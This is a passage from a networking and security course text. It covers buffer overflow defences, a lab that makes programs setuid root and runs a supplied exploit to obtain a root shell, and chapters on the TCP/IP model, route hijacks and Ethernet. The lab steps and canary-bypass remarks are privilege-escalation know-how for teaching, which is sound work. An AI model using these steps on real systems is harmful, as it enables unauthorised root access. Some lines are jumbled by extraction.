otherwise using it." The 239 programmer must realize that she is responsible for data integrity, and must be vigilant in testing and retesting all code for this potential problem. Several C library functions are notorious for inviting buffer overflow problems. In our EC310 class, the strcpy function is a well-known culprit. The designers of C have, in fact, provided an improved version of this particular command—the improved version, named strncpy, introduces some protection against writing beyond the end of an array. The format for the strncpy command is strncpy(destination_string , source_string , number_of_characters_to_copy) The strncpy command's third argument is the number of characters to copy. The programmer can ensure, through the use of this third argument, that we do not write beyond the bounds of the string destination_string. The function scanf was also revised to permit the user to have some control of the total number of characters read in from the keyboard. The battle between hackers and programmers never ends. When hackers first started to take advantage of the fact that strcpy allows us to enter strings of any size into buffers of fixed size, programmers responded by writing the strncpy function. Hackers quickly learned that if the source string is longer than the specified number of bytes to be copied, the strncpy function does not automatically append a terminating NULL to the string that is copied. Thus, if the programmer is not careful, a new set of hacks can be developed, based on the existence of strings sitting in memory without a NULL terminator. Beyond awareness and careful coding, several technical solutions have been proposed. The non-executable stack. This approach forbids the operating system from executing instructions that are on the stack. Basically, with this approach, the eip register would never be permitted to hold an address that is in the stack's address range. Machine language instructions would not ordinarily be found on the stack (the machine language instructions would be in the text section), so there is no reason for the eip to ever point to the stack's region in memory. It must be noted that this solution still poses some problems. First, it does not prevent a buffer overflow; rather, it prevents a buffer overflow from following through with the execution of machine language instructions that were placed on the stack. This approach does not protect against an adversary crashing our machine on a segmentation fault. Also, some highly specialized applications actually depend on having executable code on the stack. The canary. This approach entails placing a specific known value on the stack just prior to the return address. This known value is termed a canary (since a canary was used in coal mines to provide an advance indication of danger). An attempt to overwrite the return address will necessarily overwrite the canary. Before a function returns, the canary is checked to see if it has been altered. If the canary has been altered, the program is halted. Hackers have found ways to defeat the use of a canary. First, if known canaries are used (for example, if a canary of -1 is always used, the hacker can perform a buffer overflow, overwriting the return address while making sure that the canary is overwritten with the correct value (-1). If the programmer uses a pseudo-random canary, the hacker can attempt to read the canary value as part of the exploit, taking care to overwrite it with the prior value. Address Space Layout Randomization (ASLR). In this technique, the stack and the heap are placed in random memory locations, preventing the hacker from easily predicting the location of the return address. Of course the locations of the stack and the heap are not completely random, but are usually arranged according to a fixed number of possible options. Starting with Vista, Microsoft used ASLR with 256 different possible options for the stack-heap layout. A common counter-hack (not covered in this class) involves using format string vulnerabilities to determine the return address location. Of course hackers are also studying the various layout options and, eventually but certainly, hacks will be developed for each of the layout options. Practice Problem 10.1 Briefly describe two technical solutions that have been proposed to prevent a program from being exploited by a buffer overflow. Solution: 240 Problems 1. Order these three main components of a buffer overflow exploit as they will appear on the stack: shellcode malicious return address nop sled 2. Aside from careful programming and the modification of several specific C commands, list and briefly describe two technical solutions that have been proposed to prevent a program from being exploited by a buffer overflow. 3. Explain why the buffer overflow described in this chapter is much more insidious than the buffer overflows described in Chapter 7. 241 242 Security Exercise 10 Part I. Initial Conditions To set up for this lab, carefully perform the following operations. Check off each step as you complete it. Let your instructor or lab tech know if you encounter any problems. 1. Navigate to your work directory by entering cd work In Lab 9 you used the program note2.c . Make sure that the program note2.c and its compiled machine code version, note2.exe, are both still in your work directory by entering: ls You likely have additional files in your work directory—that's fine! 2. Recall that the program named note2.c allowed all your Company mates to send you notes. The program has made you famous, and the root user would like to purchase it from you. He will pay you 25,000 Iranian rials for the program. 25,000 is a big number, so of course you accept. Transfer ownership of the program note2.c to the root user by entering: sudo chown root:root ./note2.exe Verify that you have successfully transferred ownership of the file note2.exe to the root user by entering ls 3. –l note2.exe Now, the root user wants anyone to be able to execute the program note2.exe as though they were the root user, so that anyone can leave notes in the file /tmp/notes . To give everyone the ability to write to the file /tmp/notes in a very carefully controlled manner (only via the user of the program note2.exe) we must set the setuid permission for the file note2.exe. To do this, enter: sudo chmod u+s note2.exe Verify that the setuid permission is enabled by entering ls –l note2.exe 243 4. In class today we discussed the program bettersearchnote.c . This program has been written for you and placed in the ec310code directory. Copy this file to the work directory by carefully entering the following at the home directory prompt: midshipman@EC310:~ $ cp ec310code/bettersearchnote.c Make sure you are at your home directory! work Enter this! Verify that you have bettersearchnote.c in your work directory by changing to the work directory: cd work and then listing the files in the work directory: ls 5. We need to make one change to bettersearchnote.c . Open the file using nano: nano bettersearchnote.c and change the line in the function main that reads fd = open( "/var/notes" , O_RDONLY ); to read fd = open( "/tmp/notes" , O_RDONLY ); The only change is that var becomes tmp Save the program (Control-o then Control-x) 6. Compile the program bettersearchnote.c as bettersearchnote.exe by entering: gcc –o bettersearchnote.exe bettersearchnote.c Make sure you now have bettersearchnote.exe in your work directory (enter ls). 7. Transfer ownership of bettersearchnote.exe to the root user by entering sudo chown root:root ./bettersearchnote.exe and set the setuid permission on this program by entering sudo chmod u+s bettersearchnote.exe Verify that root owns the program and that the setuid permission is enabled by entering ls –l bettersearchnote.exe 244 After all of these steps are completed, proceed to Part II. By the time I was a First Lieutenant in the Marine Corps, I earned a Navy Cross, a Silver Star, two Bronze Stars and two Purple Hearts. Can you guess who I am? Part II. Adding Some Notes Let's add some notes to the file /tmp/notes. First, let's start fresh by removing any old version of tmp/notes that might exist. Enter rm /tmp/notes If you get a message saying "No such file or directory", that's okay. Now, let's say that the root user wants to add a note saying: "Notes for today:". To accomplish this, enter sudo su root ./note2.exe "Notes for today:" exit Now, let's have joe enter the note "Parades stink". To accomplish this, enter: sudo su joe ./note2.exe exit "Parades stink" Now, let's have matrix enter the note "What is for lunch?" To accomplish this, enter: sudo su matrix ./note2.exe "What is for lunch?" exit Finally, let's have joe enter the note "Musters stink". To accomplish this, enter: sudo su joe ./note2.exe exit "Musters stink" Now, go back to your work directory (you may be there already) and look at the file /tmp/notes by entering cat /tmp/notes It didn't let you see the notes! Question 1. Why did the command cat /tmp/notes not let you see the notes? Question 2. What command would you enter to view the file /tmp/notes ? Enter your answer for Question 2 and show your instructor the contents of the file /tmp/notes. Then move on to Part III. 245 Part III. Using the Program bettersearchnote.exe Recall that the program bettersearchnote.exe allows the user to view the notes that he has entered (and only the notes that he has entered). Suppose the user matrix wants to see the notes that she has left. Switch to user matrix: sudo su matrix and run the program as matrix: ./bettersearchnote.exe Question 3. Did the program work as expected? Return to the user midshipman by entering exit Now recall that the program bettersearchnote.exe allows the user to enter a search string as a command line argument, and the program will then only print out messages left by the user that contains the specified search string. Switch to user joe: sudo su joe and run the program as joe: ./bettersearchnote.exe Question 4. What output did you obtain? Now, run the program again, but giving a command line argument: ./bettersearchnote.exe Question 5. "Must" What output did you obtain? Return to the user midshipman by entering exit Switch to user root: sudo su root and run the program as root: ./bettersearchnote.exe Question 6. What does root see when he runs the program? Question 7. Why doesn't the root user see everyone's notes? He's root after all. Return to the user midshipman by entering exit and proceed to Part IV. 246 Part IV. A Strange Occurrence One of your friends has sent you a note: "Here is a great program named exploit_notesearch.c . Try it out." In the booksrc directory, there resides a file named exploit_notesearch.c. Change to your home directory by entering cd From your home directory, copy this file by entering midshipman@EC310:~ $ cp booksrc/exploit_notesearch.c Make sure you are at your home directory! work Enter this! Verify that you have exploit_notesearch.c in your work directory by changing to the work directory: cd work and then listing the files in the work directory: ls If you do not have exploit_notesearch.c in your work directory STOP and ask your instructor or lab tech for assistance. Otherwise, continue. We have to make one change to this program. Open this program for editing using nano: nano exploit_notesearch.c and change the line that reads strcpy(command, "./notesearch \'"); // start command buffer to read strcpy(command, "./bettersearchnote.exe \'"); // start command buffer Note that this says bettersearchnote , not betternotesearch ! Add the .exe to the end! Save the program (Control-o then Control-x) Compile the program exploit_notesearch.c by entering gcc exploit_notesearch.c and execute the program by entering ./a.out Question 8. What shocking event just happened? Question 9. Enter whoami. What is the reply? The programs used in this security exercise are adapted from programs presented in Hacking, The Art of Exploitation, No Starch Press, 2008. 247 248 Security Exercise 10 Answer Sheet Name: Question 1: Question 2: Question 3: Question 4: Question 5: Question 6: Question 7: Question 8: Question 9: 249 250 Part II: The Network You are now experts on the security of an individual host. Well−okay−expert-ish. In this module you will gain an in-depth understanding of how the Internet works today and how fragile its core infrastructure really is. You will learn about the fundamental networking technologies and the design principles behind the Internet, and you will examine the security risks associated with internetworking. 251 252 Chapter 11: The TCP/IP Model Objectives: (a) Describe the TCP/IP model, the functions performed by each layer, and the process of encapsulation. (b) Define the function of a protocol. EC310 is divided into three sections. We finished Part I: The Host, where we examined specific threats against an individual computer in isolation from a network, focusing on the buffer overflow attack. We now move on to Part II: The Network, where you will gain an in-depth understanding of how the Internet works today and how fragile its core infrastructure really is. After we complete the network section, we will move to our final unit, Part III: Wireless, where you will gain an appreciation for the unique security threats inherent when operating in a wireless environment. (Graphic by Dane Brown and Jennie Wood) I. An Example of Network Fragility The Internet was actually designed in the 1970s, long before its security became a concern. As the Internet's protocols were being put in place, the underlying assumption was that the Internet would only be used by cooperating scientists and academics who had no reasons to act with malice toward each other. Since security was not an issue, many of the underlying Internet protocols, to this day, rely on a measure of trust and cooperation among the parties that regulate and control the Internet's infrastructure. 253 This is particularly true when routing traffic through the Internet. It should be obvious that it is beneficial to route traffic from source to destination using the best path. It would not make sense to route Internet traffic from Boston to New York via Tokyo. The decisions concerning which routes are best for reaching various destinations are largely determined through cooperation among the Internet's routers. Basically, each router tries to determine how easily it can get to various particular destinations, and the routers exchange this information with each other. Through this cooperative exchange, a consensus emerges over which routes are optimal to reach specific destinations from any starting point. So, with so much cooperation, what could go wrong? In 2008, A Dutch politician named Geert Wilders released a three and a half minute trailer for a controversial short film that explored the ties between Koranic teachings and terrorism. The trailer and the film (which was subsequently released in 2009) were both critical of Islam and created an uproar in many Muslim-dominated countries. The film trailer also caused an uproar that reverberated throughout the global Internet. 17 Pakistanis marched through Karachi to protest the video. In response, the Pakistani government ordered that YouTube be blocked in all of Pakistan to prevent Pakistani citizens from viewing the offending movie trailer. On Sunday, February 4th, 2008, Pakistan Telecom, the national ISP, complied with the order to block YouTube by advertising itself to the rest of the world as the best route to reach YouTube. In essence, Pakistan Telecom announced to the all other routers on the Internet: "If you want to reach YouTube, I can get you there nearly instantaneously—so if you want to get to YouTube quick, forward your request to Pakistan Telecom." A man trying to access YouTube from his home in Karachi had his request routed to Pakistan Telecom instead. But the repercussions extended far beyond the borders of Pakistan. The Internet's routers—throughout the world—assuming that the information was truthful, autonomously adjusted their optimal route to YouTube by sending all worldwide YouTube requests to Pakistan Telecom. Because of the level of trust among the Internet's key players, no verification was made to check if the new route made any sense. Pakistan Telecom—needless to say—simply discarded these requests from people around the world wanting to get to YouTube. Instead of the usual cat videos or clips of old people falling down the stairs, viewers were greeted with this far less entertaining display: It should be noted that subsequent investigations revealed that Pakistan Telecom only intended to block YouTube within Pakistan; they did not foresee that their actions would affect the broader Internet. Also, Pakistan Telecom did not disrupt the correct routing information that was all-the-while promulgated by YouTube's servers and Internet routers; it simply promulgated "better" routing information. In any event, the YouTube outage affected the world and lasted for over two hours. In a similar incident, on Christmas Eve in 2004, a company in Turkey inadvertently announced that it was the best path to everything on the Internet. A report by Todd Underwood of the Internet Management firm Renesys concluded that "Virtually everything on the Internet was unreachable for someone: banks, governments, ecommerce sites, businesses, universities–no one escaped the damage." This event lasted several hours. 17 The interested midshipman can view the controversial movie trailer here: http://www.youtube.com/watch?v=jKCZfnpU1uc 254 Worldwide availability of YouTube drops from 100% to 0% for an hour, and does not fully recover for over two hours. (Source: Keynote Systems) Likewise, in an event that one can only assume was accidental, Con Edison—the electric company for New York City— announced that it was the best route to reach Martha Stewart Living Omnimedia. For several hours, individuals who wanted to check on the right color salad bowl to use at a springtime picnic were routed to the gritty website of a public service utility. This is a problem affecting the Internet right now. The ease with which a hacker can manipulate routing tables to intercept or redirect Internet traffic remains startling. In November 2013, Renesys noted that on 38 distinct occasions over the period February 2013-November 2013, Internet traffic affecting major financial institutions and government agencies was inexplicably routed through Belarus. The graph below shows the route taken by a banking transaction between New York and Los Angeles that was mysteriously routed through Belarus. These routing calamities are not limited to the US. On Tuesday January 21, 2014, most of China's 500 million Internet users had all of their Internet traffic redirected to a nondescript residential building in Cheyenne, Wyoming. In short, China was cut off from the Internet for about eight hours. What would happen if an Internet Service Provider for Iran announced it had the best route to the US DoD? More to the point: Why does the Internet work this way? For the next five weeks we will pull apart the infrastructure of this mysterious creature called the Internet. 255 II. Layers 1. Divide and Conquer. Computer networks are exceedingly complex. To enable effective communication we must attempt to coherently organize the various functions that must be carried out. To reduce the complexity in designing networks, and to make the task more manageable, networks are organized as a series of layers. The guiding principles are: Each layer performs only a few specific, well-defined functions. This simplifies the design. The layers are built, one on top of the next. Each layer performs a service for the layer above it. However, how a layer does its job is not known by the layer above. This permits later modifications. A single piece of software that provides all networking capability would be very hard to modify later. This notion of organizing a network into a series of layers is similar (conceptually) to the way that programs are organized into a series of modular functions. 2. Example. Suppose you want to send an email to your friend. You have email application software on your computer, and your friend has email application software on her computer. Thus, you can compose an email on your computer using your application, and if this email was to land at the doorstep of the email application on your friend's computer, she could then read it. But… how does this email get from your email application program to your friend's email application program? They are separated by a geographic distance. You have no idea of how to proceed in getting your email from the email application on your computer to the email application on your friend's computer, so you consult with your friend, the Transport layer. You don't recall when your friend Transport became so verbose, but you decide to leave your problem with him. 256 Although your friend Transport was willing to help, and has taken custody of your email message, he quickly realizes he cannot proceed. Not knowing what to do, he contacts his friend, the Network layer. You wonder about why your friend Network used so many words to say "I can't help you, but I'll see what I can do", but you— Transport—decide to leave your problem (which was actually Application's problem) with your friend Network. Although your friend Network was willing to help, and has taken custody of the email message, he quickly realizes he cannot proceed. Not knowing what to do, he contacts his friend, the Data Link layer. 257 You wonder about why your friend Data Link is such a blabbermouth, but you—Network—are happy you do not have to deal with Rickover Hall personnel, so you leave the email with your friend Data Link. Although your friend Data Link was willing to help, and has taken custody of the email message, he quickly realizes he needs his friend, the Physical Layer, to help. You wonder about why your friend Physical is such a Debbie Downer, but then you remember—all those years in the basement of Rickover!—and you're just happy to get the message to him (and off your desk). 258 But here is the important point: The physical layers are able to successfully communicate: So, the original email leaves the email application on the left, travels down the five layers (Application, Transport, Network, Data Link and Physical), then travels across a physical medium, landing in at the destination computer. At the destination computer the message transits up the five layers, eventually arriving at the email application of your friend's computer, on the right. In light of the picture above, recall the guiding principles we mentioned at the outset: Each layer performs only a few specific, well-defined functions. This simplifies the design. For example, in the email scenario above, the transport layer only worried about getting the message delivered to the right application (the email application) and having it arrive correctly. The transport layer did not worry about routing (that was left to the network layer) or whether logical one should be represented by +5 volts (that was left to the physical layer). The layers are built, one on top of the next. 259 Each layer performs a service for the layer above it. However, how a layer does its job is not known by the layer above. This permits later modifications. For example, the network layer is tasked with determining the best route from source to destination, but the choice of algorithm used should be of no consequence to the transport layer. If we were to change the network layer routing algorithm from a link-state algorithm to a distance-vector algorithm, the transport layer should not even be aware of this. If we decided to try to build one big honking software/hardware contraption that does everything at once (i.e., just put the whole kit and kaboodle into one layer), the resulting mess would be extremely difficult to modify later. Splitting functions into layers simplifies the design. Additionally, it allows us to replace a layer with a different implementation that accomplishes the same task using a different mechanism, without disturbing the other layers. 3. Protocols It is important to note that actual communication takes place only between the five layers in the same machine and the physical layers of adjacent machines. In the picture on the preceding page, the dark black lines signify the only true transfer of data—i.e., the only real communication. Apart from the physical layer, no data are actually directly transferred from layer n on one machine to layer n on the other machine. Instead, each layer passes information/data only to the layer immediately above or below it. In a real sense, though, it seems as if the email application in the machine on the left in the picture above is communicating directly with the email application in the machine on the right. Similarly, it seems as if the transport layer on the left is communicating directly with the transport layer on the right. In fact, it seems as if each layer on the left is communicating with its peer layer on the right. This communication is termed virtual communication. A layer in one machine communicates with the corresponding layer on the other machine using that layer's protocol. For example, the transport layer of the machine on the left communicates with the transport layer of the machine on the right using the transport layer protocol. A protocol is an agreement or a set of rules governing how a task or process should be carried out. We mentioned that one of the functions of the transport layer is to ensure that data is delivered without errors. The transport layers on both machines might, for example, use the Hamming code to ensure that errors are detected and corrected. In this case, the agreed upon protocol for error detection at the transport layer is the Hamming code. If the transport layer in the machine on the left is using the Hamming code to detect errors, but the machine on the right is using the CRC algorithm to detect errors, communication will not be successful. The peer entities at each layer must agree on the protocol. As another example, we mentioned that one of the functions of the physical layer is to determine how logical 1 and logical 0 are represented. If the physical layer of the machine on the left is representing logical one by +5 volts and logical zero as -5 volts, but the machine on the right is doing just the opposite—representing logical one as -5 volts and logical zero as +5 volts— communication will not be successful. The peer entities at each layer must agree on the protocol. To recap, two machines might be connected, but if a protocol is not in place at each layer, there will be no communication. If two people are talking to (at) each other, one who only speaks English and the other who speaks only Chinese, no successful communication will occur because the two speakers are not using the same protocol (in this case, the language). If agreed upon 260 protocols are in place, then the entities on the same layers on different machines (i.e., peer entities) carry on a conversation using the agreed-upon protocol. Some additional jargon to impress your date: Network Architecture. The set of layers and protocols is termed a network architecture. Protocol Stacks. The protocols used by a system are called the system's protocol stack. 4. Tanenbaum’s Philosopher Analogy18 The various terms—layers, protocols, virtual communication, etc.—may seem confusing, so let's use these same concepts in a non-networking setting. Two philosophers wish to communicate, but they are far apart and they don’t speak the same language. So they each hire a translator who translates their messages into a common language. The translators then pass their messages along through secretaries, who can communicate through a common interface. Note that it doesn’t matter what the common interface is (fax, phone, e-mail) as long as both secretaries use the same interface. Similarly, it doesn’t matter what the common language is (Dutch, English, Swahili) as long as the translators agree. Also, note that neither the secretaries nor the philosophers need know what the language choice was. Just like the philosophers and the translators don’t need to know how the message is transmitted. Each layer just needs to understand its interface to the next layer. Figure 1. Tanenbaum’s Philosopher Analaogy. From Andrew S. Tanenbaum, Computer Networks, 4th ed., Prentice Hall, 2003 18 See: Andrew S. Tanenbaum, Computer Networks, 4th ed., Prentice Hall, 2003 (pages 28-29) 261 So… how many layers exist in this scheme? You should agree that we have three layers, which we might call the Philosopher Layer, the Translator Layer and the Secretary Layer. Entities at the same layer must use the same protocol, or communication will not be successful. If the translator on the left translates messages into French while the translator on the right is expecting to receive messages in German, no deep philosophical thoughts will be exchanged between the philosophers. If the secretary on the left sends messages by fax, but the secretary on the right is only expecting messages by email, no philosophical thoughts will be shared. Think about how layering helps us in this scenario. We can easily replace a layer with a different implementation that accomplishes the same task using a different mechanism, without disturbing the other layers. For example, the two translators might shift from Latin to Hebrew. As long as the two translators agree, the philosophers and secretaries will not be concerned (they might not even be aware of the shift in the language protocol). Similarly, the two secretaries might agree to shift from the fax protocol to the email protocol without even informing the translators or philosophers. 5. Encapsulation So think again… how does a layer do its job? Here's how: At the sending end, each layer puts a header on the message received from the layer above. The header contains information necessary for the protocol to do its job. At the receiving end, each layer strips off the corresponding header and forwards the rest up to the layer above. The application layer passes its message to the transport layer. The transport layer attaches some number of bits, shown as T in the picture above and sends this onward to the network layer. The network layer then appends some number of bits, shown as N in the picture above, and so on, down the protocol stack. What actually gets transmitted across the physical layer from the source to the destination is: Now, this arrives at the destination. 262 The destination physical layer removes the bits marked P and passes the result up to the data link layer. The data link layer removed the bits marked D and uses these bits to implement the data link protocol. Then the result is passed to the network layer which removes the bits marked N and uses these bits to implement the network layer protocol, and so forth. Practice Problem 11.1 Suppose an application entity generates 1024 bytes of data. By the time this data arrives at the data link layer, 96 bytes of header information has been added. At the data link layer, the maximum frame size is 256 bytes, 32 bytes of which are its header. How many frames will be used? How many total bytes must be transmitted? Solution: III. The TCP/IP Reference Model The model we used is Section II was not chosen randomly! This model, repeated below, is termed the TCP/IP reference model. 263 You should memorize this model! Use a mnemonic if it helps. One possibility is the West Point motto: Please Do Not Trash Army. 1. A Five Layer Model. The model we will use is the TCP/IP reference model, which consists of five layers. We list the layer, then describe some of the functions usually assigned to the layer. The application layer The application layer is concerned with general purpose facilities that involve communications: SMTP for email HTTP for accessing the web FTP for file transfer SSH and TELNET for remote log in DNS for directory assistance SNMP for network management Several other functions are also conceptually placed at the application layer: Encoding. For example: Are we using EBCDIC or ASCII? Are we using Big Endian or Little Endian? Encryption Compression Blocks of data at the application layer are termed messages. The application layer uses end-to-end protocols that do not recognize the existence of an underlying network. The notion of a networking protocol being end-to-end can be somewhat confusing, so it may be helpful to recast the notion in terms of a different network you are familiar with: the telephone network. Suppose you (in Annapolis) are having a phone conversation with your friend (in Florida) over the plain-old-telephone system. Suppose you use some acronyms in your conversation. Instead of saying, United States Naval Academy you say USNA. Instead of saying Midshipmen Regulations Manual you say MIDREGS. Instead of saying Brigade Medical Unit, you say BMU. Instead of saying Greatest Bestest Course Ehvur you say Cyber-2. Using acronyms is a form of data compression. You are conveying the exact same information to your friend, but you are doing this with fewer syllables. Now, ask yourself: Does the Phone Company—the wires, the switching stations, the fiber optic cables—care if you are using acronyms to compress your data? The answer is, of course: No. The phone company does not care, and is not even aware, of the use of compression in your voice conversation. It only matters to the end users who are actually speaking on the telephone. Now, let's switch back to computer networks. We mentioned that the application layer can implement compression. As with phones, so with computers: only the end points will care, or even be aware of the fact that data is being compressed. The underlying computer network is oblivious to this. Consider another example: Encoding. Encoding is done at the application layer, and an encoding protocol is end-to-end: the network is not aware of the encoding scheme. In a telephone conversation, the encoding scheme might be the language that you and your friend converse in. The phone company's network does not care if your conversation is in English or Spanish; this is a concern only to the end users. So, again, the application layer protocols are end-to-end. The transport layer Ideally, the transport layer is responsible for the end-to-end transfer of data from a process in the source to a process at the destination, independent of the network. Put another way, ideally the transport layer uses end-to-end protocols that do not recognize the existence of an underlying network. Blocks of data at the transport later are termed segments. Some tasks of the transport layer: End-to-end flow control End-to-end error control End-to-end congestion control 19 Multiplexing- sending several transport layer connections over a single network layer connection. The phone company analogy is useful again for recognizing that the protocols at the transport layer are end-to-end. Does the phone company's network care if the person on the receiving end says: "Slow down, I'm trying to write this down" (Flow 19 The ideal separation of layers breaks down in practice. Although congestion control algorithms are end-to-end algorithms, they are designed to alleviate congestion in a network. 264 control)? Does the phone company's network care if the person on the receiving end says: "Let me read this back to you to make sure I've got it" (Error control)? The answers: No and No; these are end-to-end concerns. In the next three layers, the protocols are between adjacent entities (machine-router, router-router, router-machine) The network layer The network layer is concerned with transferring data across a communications network from a source computer to a destination computer. This is the first layer that recognizes the existence of a network. Blocks of data at the network layer are termed packets or datagrams Tasks for the network layer include: Routing Internetworking-interconnecting distinct networks that use different protocols (different addressing schemes, different packet sizes, etc.) The data link layer The data link layer is concerned with transferring data across a single link connecting two nodes. Blocks of data at the data link layer are termed frames. Tasks for the data link layer include: Setting frame boundaries Error control (to make a real link into an error-free link) Link flow control (to stop a fast transmitter from drowning a slow receiver) Control access to shared channels-the Multiple Access Problem The physical layer The physical layer is concerned with sending bits over a channel: i.e., the mechanical and electrical considerations. Blocks of data at the physical layer are termed bits… so we're not really talking about blocks! 2. The Big Picture Again In each layer, a process on one computer communicates with a peer process on another computer using that layer's protocol. This communication is virtual. The layer n + 1 entity uses the services provided by layer n. Layer n + 1 only cares that layer n performs the desired service. How layer n goes about performing the service (i.e., the implementation) is of no interest to layer n + 1. The layer n protocol does not interpret the information passed to it by layer n + 1. At the sending end, each layer puts a header on the message received from the layer above. The header contains information necessary for the protocol to do its job. At the receiving end, each layer strips off the corresponding header and forwards the rest up to the layer above. For example, the picture below focuses on the network layer, and we can see that a segment from the transport layer (in gray) is encapsulated into a packet at the network later (by adding the header shown in pink). This packet is then sent to the data link layer. 265 Source: Forouzan, Data Communications and Networking, 4th ed., McGraw Hill, 2007 The process will continue. The packet at the network layer will be encapsulated into a frame at the data link layer. See PowerPoint slide "Layers" on the course website. As we discuss the security issues in the TCP/IP Model, we must keep in mind that networks must remain useful. All ITSD network security problems at the Naval Academy could be instantly solved by simply preventing all midshipman, faculty and staff from using computers and computer networks! That is not a good solution. We want to be able to use our networks, but in a safe and secure manner. Practice Problem 11.2 You caught one of your crewmembers attempting to gamble online on one of your ship's computers. After putting him on report, he tells you that the computer did not seem to be working. For each of the network problems below, state which layer of the TCP/IP model the problem resides in. (a) Our computer cannot communicate with a website due to an error in the routing algorithm used by an intermediate node. (b) Our computer cannot communicate with a website because your crewmember spilled his drink on the cable adapter, causing a short. (c) Our computer cannot communicate with a website due to the fact that the two users (us and them) are using different end-to-end error control algorithms. (d) Our computer cannot communicate with a website because we are using the XYZ-encryption algorithm, but the website server is using the (incompatible) ABC-decryption algorithm. Solution: (a) (b) (c) (d) 266 Practice Problem 11.3 For the boxes below, fill in the names of the layers for the TCP/IP - 5 layer reference model and then place the appropriate letter in the blank associated with the layer for the proper description of its services. Layer 5 _____ ______ Layer 4 _____ ______ Layer 3 _____ ______ Layer 2 _____ ______ Layer 1 _____ ______ a) Provides a definition of mechanical and electrical standards for communication system b) Concerned with transferring packets across a communication network c) Responsible for end to end transfer of data d) Primary function is to format and transfer files between communication message and the user’s software e) Frames of data are transferred across a single link Solution: 267 268 Problems 1. The basic unit of information sent at the application layer is termed a message. Write down the term that is used to denote the basic unit of information sent at each of the layers listed below: (a) transport layer (b) network layer (c) data link layer (d) physical layer 2. What is the name used for the data unit that is encapsulated within a data link frame? 3. What is the name for the data unit that is decapsulated from a packet? 4. A program wants to send 100 bytes of data. The application layer adds a ten byte header (resulting in a 110-byte message). Suppose every succeeding layer also appends a ten byte header. When the resulting bits are eventually transmitted out of the physical layer, what percentage of these bits corresponds to the program's data? 5. State the layer of the TCP/IP reference model that is responsible for each of the following tasks: (a) Determining the route from source to destination (b) Handling a frame received from an adjacent computer (c) Detecting end-to-end errors (d) Transmitting +5 volts to denote logical 1 and -5 volts to denote logical 0 6. 7. (a) Suppose an application entity sends an L-byte message to its peer entity. The layers in the TCP/IP model add a total of 58 bytes of overhead (header and trailer). What percentage of the physical layer bits corresponds to the application message if L = 100 bytes. (b) Repeat part a for L = 1000 bytes. List the layers of the TCP/IP model and select from the list below the letter that best describes the main function of each layer. (a) Transfers frames across a single link connecting two nodes (b) Responsible for end-to-end flow, error, and congestion control (c) Sends bits over a channel (d) Processes that provide services to users such as HTTP and FTP (e) Responsible for routing packets and internetworking 269 270 Chapter 12: Ethernet Objectives: (a) Define the structure of an Ethernet address. (b) State the minimum and maximum size of an Ethernet frame. (c) Calculate the bandwidth available to users in various network configurations. (d) Distinguish between the capabilities and uses of a hub, a bridge and a switch. I. Ethernet 1. Introduction. In the late 1960's and into the early 1970's, computers were stand-alone devices. A computer at, say, Stanford, had no way of communicating with a computer at, say, the Naval Academy. Research teams (largely funded by the DoD) began to explore methods for linking computers together, allowing them to transmit information back and forth. A breakthrough occurred when Robert Metcalfe proposed a technique for joining computers together. At heart, the computers were joined together by a wire allowing bits to flow between computers. The sketch below (from Metcalfe's 1976 conference paper) shows four computers (in red) joined together by a wire (in yellow). (Note that one of the four computers is drawn to be larger than the other three in order to show some internal details). Metcalfe, an Electrical Engineer, called his proposal "Ethernet." His company, Xerox (yes, Xerox, the same company that said "No Thank-you" to the first computer with a GUI that it had developed in-house three years before Apple, and the same company that saw no future in the first computer mouse that it had developed in-house) was not interested in doing anything with the Ethernet proposal, so Metcalfe formed his own company in 1979 and named it 3Com. 3Com went on to sell hundreds of millions of Ethernet adapter cards as a Fortune 500 Company (3Com was purchased by HP in 2009). Network World reported that by 2010, approximately $16 billion in Ethernet equipment had been sold per year. 20 You may be wondering: Just run a wire between the computers?…there's got to be more to it than that! There are indeed four considerations. First, if one computer sends data to another, there has to be a mechanism to allow the intended recipient to know where the block of data begins and ends. In other words, the recipient must be able to look at the collection of received bits—called a frame—and determine where the frame begins and ends. This is called the framing problem. Second, in order to send a frame to a specific device, every device will need a unique address. This is the address problem. Third, the receiver should be able to determine if the received frame has errors. This is called the error-control problem. Fourth, we have to consider the possibility that more than one computer may place their frame on the wire at the same time. This will cause the electrical signals to collide, and both frames will be destroyed. This is called the multiple access problem. Metcalfe's breakthrough proposal—Ethernet—handles these four issues. Other competing proposals to join computers together into a local area network (Token Ring, Token Bus, ATM, FDDI) have since fizzled and died, leaving Ethernet as the only game in town for wired local area networks. The original Ethernet transmitted at a bit rate of 10 mega-bits per second (Mbps). In 1995, a 100 Mbps Ethernet standard was introduced, dubbed Fast Ethernet. This was followed in 1998 by Gigabit Ethernet (with a data rate of 1 Gbps) and in 2002 20 In 1996, Steve Jobs stated that "'Xerox could have owned the entire computer industry today." 271 by a 10 Gbps standard (10-Gigabit Ethernet). products have not yet reached the market. A 100 Gbps Ethernet standard was recently approved (2010), but commercial Note thatFigure we are dealing exclusively transmitting 13.4 802.3 with MAC frame data over a single link. Stated another way and with reference to the TCP/IP reference model: we are dealing with data link-layer concerns. Additionally, note that Ethernet is implemented in a computer's Network Interface Card (NIC). 2. Ethernet's Solution to the Framing Problem All Ethernet variants (10 Mbps, 100 Mbps, 1 Gbps and 10 Gbps) use the same data link frame format, shown below. Source: Forouzan, Data Communications and Networking, McGraw Hill, 2007 The fields are: Preamble: The preamble is not formally part of the Ethernet frame. It is added by the physical layer. It consists of the byte 10101010 repeated 7 times. The preamble allows the receiver to synchronize to the beginning of the frame. Start Frame Delimiter (SFD): The SFD is not formally part of the Ethernet frame. It is added by the physical layer. 13.7It is the single byte: 10101011 Notice that the start frame delimiter follows the same pattern of alternating ones and zeroes as the preamble, except that it concludes with two consecutive 1's. These two consecutive 1's indicate that synchronization is over, and the real stuff is about to start: the next item will be the destination address. The Destination and the Source Ethernet Addresses: Much more on this to follow! Length or Type: This field usually specifies the kind of data the frame carries (e.g.: Is the data an IP packet?). In rare implementations, this field is used instead to serve as a Length Field, providing the number of bytes in the data field. Data and padding: This holds the data that was received from the network layer. The minimum size of the "Data and Padding" field must be 46 bytes, and the maximum size of this field is 1500 bytes. CRC: Cyclic Redundancy Code used for error detection. More on this below. Practice Problem 12.1 What is the minimum size of an Ethernet frame? (Do not include the physical layer header in your calculation.) Solution: Practice Problem 12.2 What is the maximum size of an Ethernet frame? (Do not include the physical layer header in your calculation.) Solution: 272 Practice Problem 12.3 Why would padding ever be used in the field marked Data and padding? Solution: So, Ethernet frames must be at least 64 bytes and are not permitted to exceed 1518 bytes. Which raises the question: Why these size limitations? The maximum Ethernet frame size is easy 